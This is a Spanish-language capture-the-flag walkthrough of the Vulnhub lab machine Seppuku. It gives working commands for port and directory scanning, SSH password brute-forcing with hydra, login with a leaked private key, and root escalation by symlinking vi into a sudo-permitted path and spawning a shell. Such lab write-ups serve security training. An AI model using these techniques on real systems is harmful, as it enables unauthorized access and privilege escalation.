[VLN] Seppuku

Hoy vamos a hackear la maquina de Vulnhub llamada Seppuku. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/seppuku-1,484/

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

sml@m0nique:~$ nmap -A -p- 192.168.112.132 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 22:31 CEST Nmap scan report for 192.168.112.132 Host is up (0.0010s latency). Not shown: 65527 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA) | 256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA) |_ 256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519) 80/tcp open http nginx 1.14.2 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=Restricted Content |_http-server-header: nginx/1.14.2 |_http-title: 401 Authorization Required 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) 7080/tcp open ssl/http LiteSpeed httpd |_http-server-header: LiteSpeed |_http-title: 404 Not Found | ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/co untryName=US | Not valid before: 2020-05-13T06:51:35 |_Not valid after: 2022-08-11T06:51:35 |_ssl-date: 2020-05-18T20:32:26+00:00; 0s from scanner time. | tls-alpn: | h2 | spdy/3 | spdy/2 |_ http/1.1 7601/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Seppuku 8088/tcp open http LiteSpeed httpd |_http-server-header: LiteSpeed |_http-title: Seppuku Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 59m59s, deviation: 2h00m00s, median: 0s |_nbstat: NetBIOS name: SEPPUKU, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian) | Computer name: seppuku | NetBIOS computer name: SEPPUKU\x00 | Domain name: \x00 | FQDN: seppuku |_ System time: 2020-05-18T16:32:22-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-18T20:32:23 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 43.21 seconds

Vemos que tiene varios puertos abiertos. Vamos a echar un vistazo al puerto 7601 para ver si encontramos algo interesante.

sml@m0nique:~$ gobuster dir -u http://192.168.112.132:7601 -w /usr/share/wordlists/dirb/big.txt -x php,txt,htm,html =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.112.132:7601 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,txt,htm,html [+] Timeout: 10s =============================================================== 2020/05/18 22:35:58 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htpasswd.txt (Status: 403) /.htpasswd.htm (Status: 403) /.htpasswd.html (Status: 403) /.htpasswd.php (Status: 403) /.htaccess (Status: 403) /.htaccess.php (Status: 403) /.htaccess.txt (Status: 403) /.htaccess.htm (Status: 403) /.htaccess.html (Status: 403) /a (Status: 301) /b (Status: 301) /c (Status: 301) /ckeditor (Status: 301) /d (Status: 301) /database (Status: 301) /e (Status: 301) /f (Status: 301) /h (Status: 301) /index.html (Status: 200) /keys (Status: 301) /production (Status: 301) /q (Status: 301) /r (Status: 301) /secret (Status: 301) /server-status (Status: 403) /stg (Status: 301) /t (Status: 301) /w (Status: 301) =============================================================== 2020/05/18 22:36:08 Finished ===============================================================

Encontramos 2 directorios interesantes: /keys y /secret. En el directorio http://192.168.112.132:7601/keys vemos que hay un fichero llamado private... Lo descargamos, y le damos permisos "600" porque parece ser una key de ssh.

sml@m0nique:~$ wget http://192.168.112.132:7601/keys/private -O private.pkey sml@m0nique:~$ chmod 600 private.key

En http://192.168.112.132:7601/secret/ podemos ver el fichero password.lst. Parece un diccionario, asi que lo descargamos.

sml@m0nique:~$ wget http://192.168.112.132:7601/secret/password.lst -O psecret.txt

Hacemos bruteforce(ssh) al usuario seppuku con el diccionario que hemos encontrado :)

sml@m0nique:~/$ hydra -l seppuku -P psecret.txt 192.168.112.132 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-18 23:26:28 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 93 login tries (l:1/p:93), ~6 tries per task [DATA] attacking ssh://192.168.112.132:22/ [22][ssh] host: 192.168.112.132 login: seppuku password: eeyoree 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-18 23:26:43

Encontramos la clave para sepukku, asi que nos logueamos.

Low Shell

sml@m0nique:~/$ ssh seppuku@192.168.112.132 bash seppuku@192.168.112.132's password: seppuku@seppuku:~$ id uid=1000(seppuku) gid=1000(seppuku) groups=1000(seppuku),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev ),109(netdev) seppuku@seppuku:~$ sudo -l Matching Defaults entries for seppuku on seppuku: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User seppuku may run the following commands on seppuku: (ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/

Vemos que puede ejecutar un comando con "sudo" el cual linka el directorio root a tmp. Lo ejecutamos...

seppuku@seppuku:~$ /usr/bin/ln -sf /root/ /tmp/

Seguimos explorando el sistema.

seppuku@seppuku:~$ ls -la total 28 drwxr-xr-x 3 seppuku seppuku 4096 May 18 16:30 . drwxr-xr-x 5 root root 4096 May 13 04:50 .. -rw-r--r-- 1 seppuku seppuku 220 May 13 00:28 .bash_logout -rw-r--r-- 1 seppuku seppuku 3526 May 13 00:28 .bashrc drwx------ 3 seppuku seppuku 4096 May 13 10:05 .gnupg -rw-r--r-- 1 root root 20 May 13 04:47 .passwd -rw-r--r-- 1 seppuku seppuku 807 May 13 00:28 .profile seppuku@seppuku:~$ cat .passwd 12345685213456!@!@A

Vemos que el contenido del fichero .passwd posiblemente sea una password, asi que miramos que usuarios hay en el sistema para probar.

seppuku@seppuku:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin seppuku:x:1000:1000:seppuku,,,:/home/seppuku:/bin/rbash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin lsadm:x:998:1001::/:/sbin/nologin ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin samurai:x:1001:1002:,,,:/home/samurai:/bin/rbash tanto:x:1002:1003:,,,:/home/tanto:/bin/rbash

Intentamos con samurai:

seppuku@seppuku:~$ su samurai su samurai Password: 12345685213456!@!@A samurai@seppuku:~$ id uid=1001(samurai) gid=1002(samurai) groups=1002(samurai)

Ahora, como samurai, vemos que podemos hacer...

samurai@seppuku:~$ sudo -l Matching Defaults entries for samurai on seppuku: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User samurai may run the following commands on seppuku: (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

El comando sudo nos deja usar un comando, pero esta dentro de la home del usuario tanto... Dejamos esta shell abierta como "samurai". Abrimos una shell nueva y probamos si con la key "private" que hemos encontrado antes, nos podemos loguear como tanto.

sml@m0nique:~/$ ssh -i private tanto@192.168.112.132 Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed May 13 10:53:17 2020 from 192.168.1.48 tanto@seppuku:~$

Privilege Escalation

Bien, estamos dentro. Vamos a hacer un enlace simbolico de "vi" en /home/tanto/.cgi_bin/bin. De ese modo, el usuario samurai podra hacer "sudo" y entonces ejecutara vi para ver el fichero "root.txt" y por otro lado, podremos obtener una shell de root usando vi para ejecutar "sh".

tanto@seppuku:~$ bash -i tanto@seppuku:~$ mkdir .cgi_bin tanto@seppuku:~$ cd .cgi_bin tanto@seppuku:~/.cgi_bin$ ln -s /bin/vi bin

Ahora que hemos hecho nuestro "trabajo" como "tanto", ejecutamos como usuario samurai:

samurai@seppuku:~$ sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/../tmp/root/root.txt

Se nos abrira el fichero root.txt con la flag, con el editor vi. Si queremos shell de root, en vi ejecutaremos:

:!/bin/sh

Y ya seremos root :)

root.txt

# id uid=0(root) gid=0(root) groups=0(root) # cd /root # ls root.txt # cat root.txt {SunCSR_Seppuku_2020_X}

End

Y con esto ya seriamos root de la maquina :)